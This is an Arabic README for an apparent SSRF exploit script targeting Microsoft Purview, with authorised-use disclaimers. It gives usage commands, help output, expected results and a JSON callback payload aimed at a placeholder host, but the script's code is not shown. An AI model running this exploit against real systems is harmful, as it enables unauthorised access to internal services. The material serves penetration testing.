
ثغرة SSRF في Microsoft Purview
يحتوي هذا المستودع على سكربت مصمم لاستغلال ثغرة SSRF (Server-Side Request Forgery) لأغراض الاختبار والتعليم. استخدم هذه الأداة بمسؤولية وفقط في البيئات التي لديك إذن صريح بها.
bash (شل يونكس)jq (معالج JSON)curl (أداة سطر أوامر لطلبات HTTP)./script.sh --exploit <target_url> <purview_url>
| الخيار | الوصف |
|---|
-h, --help | عرض قائمة التعليمات. |
--exploit tu pu | تنفيذ استغلال SSRF باستخدام عنوان URL الهدف وعنوان URL النطاق. |
./script.sh -h
Output:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
المخرجات المتوقعة:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url، في محاولة لاستغلال ثغرة SSRF../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
يتم حفظ رمز استجابة HTTP ونصها، وبناءً على رمز الحالة، يتم تحديد نجاح أو فشل الاستغلال.
هذا السكربت لأغراض الاختبار فقط. إساءة استخدام هذا السكربت قد تؤدي إلى عواقب قانونية وخيمة. تأكد من الامتثال لجميع القوانين والمعايير الأخلاقية المعمول بها.
لا تتردد في المساهمة عن طريق إنشاء طلبات سحب أو الإبلاغ عن المشكلات.
هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.